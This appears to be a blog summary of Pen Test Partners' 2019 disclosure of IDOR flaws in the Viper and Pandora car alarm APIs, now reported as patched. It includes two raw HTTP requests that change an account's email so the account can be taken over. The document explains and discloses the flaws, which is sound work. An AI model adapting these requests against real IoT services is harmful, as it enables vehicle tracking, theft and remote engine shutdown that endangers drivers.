3rd party car alarms make vehicles susceptible to theft

On March 8, 2019 security researchers at Pen Test Partners disclosed vulnerabilities found in the application programming interface (API) of Viper, and Pandora 3rd party car alarm systems. The vulnerabilities found in both systems allowed an attacker to:

• Locate vehicles in real time
• Identify types of cars
• Disable the alarm
• Unlock the car
• Engage the car’s immobilizer
• Kill the engine

3rd Party Car Alarms

3rd party car alarms provide a layer of security for keyless entry vehicles. These are vehicles where one does not need to use a physical key to unlock and start a car. 3rd party vendors market themselves as a solution for insecure keyless entry that come with these vehicles. Altogether, both Viper and Pandora–car alarm systems that were studied–have a combined set of 3 million cars that use their car alarms.

Pandora systems claimed their system was unhackable, courtesy of Pen Test Partners.

The Vulnerability

Both Pandora and Viper had the same vulnerability in their API. This vulnerability is known as an insecure direct object references (IDOR), where there is a lack of verification of the user to sensitive objects/variables in the functionality of a program. Due to this IDOR, it is possible for a malicious user to send an email and password change request to a user’s account. This allows the malicious user to revoke access to accounts for use of the car alarm, and transfers access of accounts to the malicious user. For the Viper alarm system, the /users/Update/xxxxx request is not properly validated.

Here is a sample of the Viper Smart Start alarm update user request:

POST /users/Update/xxxxx HTTP/1.1
Host: colt.calamp-ts.com
Connection: close
Content-Length: 342
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://colt.calamp-ts.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://colt.calamp-ts.com/dashboard/home
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __utma=36020146.382676338.1549803856.1549803856.1549803856.1; __utmc=36020146; __utmz=36020146.1549803856.1.1.utmcsr=medium.com|utmccn=(referral)|utmcmd=referral|utmcct=/@evstykas/remote-smart-car-hacking-with-just-a-phone-2fe7ca682162; kohanasession=flrd2pb6lcqohnu3ld79p9oif7; __utmt=1; __utmb=36020146.8.10.1549803856

FirstName=f&LastName=l&Email=egw2%40mailinator.com&Phone=123+132-1321&UserName=egw2%40mailinator.com&Password=!Password1&Language=English&Measurement=Imperial&Timezone=Etc%2FGMT%2B8&Pincode=0&Question=What%2Btown%2Bwere%2Byou%2Bborn%2Bin%253F&Answer=no&MsgFlag=0&DaylightSavings=0&CustomAttributes=%5B%5D&SessionId=flrd2pb6lcqohnu3ld79p9oif7

Viper update user request, as given by Pen Test Partners.

Pandora alarms also has a similar vulnerability that allows change of an email address:

POST /api/sputnik/workers?id=xxxxx HTTP/1.1
Host: pro.p-on.ru
Connection: close
Content-Length: 167
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://pro.p-on.ru
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json
Referer: https://pro.p-on.ru/workers/185000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: lang=en; sid=4020f4ba21edb3082902e227937995d6

{“id”:xxxxx,”name_f”:”name”,”name_i”:”name_i”,”name_o”:”name_o”,”groups”:[],”email”:”newemail”,”type”:”user”,”company_perms”:0}

Pandora alarms update email request, as given by Pen Test Partners.

After changing user email, a password reset can be requested and the malicious user gains access to the Viper account.

After gaining access to either a Viper or Pandora account, a malicious user is able to use all features of the associated web application for the vehicle. This includes locating the vehicle, killing the engine of the vehicle, unlocking the car, and starting the car.

Impact

Pen Test Partners claims that there are 3 million cars affected by the vulnerabilities that existed in both Viper and Pandora alarm systems combined. This means that from the distribution, up until the patch, malicious users were able to target customers of alarm systems to compromise accounts, locate ideal vehicles, and steal them. There is also concern for safety, as the car’s engine could be remotely killed. While the intention is for use if the car is being stolen, this capability may also be used maliciously to cause traffic accidents.

Internet of Things (IoT) is a fad in the interconnectivity of many tools, vehicles, and appliances through the Internet that allow a user to conveniently manage devices remotely. Viper and Pandora’s car alarms are IoT devices by this definition. The issue with IoT is that the Internet becomes a vector for attack to devices without proper authentication, as seen in the vehicles that have Viper and Pandora alarm systems.

IoT is not the only consideration to make when purchasing vehicles or devices, as cars which have keyless entry capabilities like Tesla vehicles have been susceptible to attacks that steal radio-frequency identification (RFID) between vehicle and keys to allow malicious users to unlock and steal vehicles. https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/

Mitigations

Both Viper and Pandora have updated code to patch the IDOR vulnerabilities, and it is no longer possible to compromise user accounts in this way. Besides this, it is important to consider as a consumer whether IoT is necessary for your lifestyle, or for business operations. Consider the implications if the device is accessed by a user other than the intended one, and perhaps opt-out of keyless entry systems.

Sources

https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms/

https://www.securityweek.com/flaws-smart-alarms-exposed-millions-cars-dangerous-hacking-0

https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References

https://www.businessinsider.com/internet-of-things-definition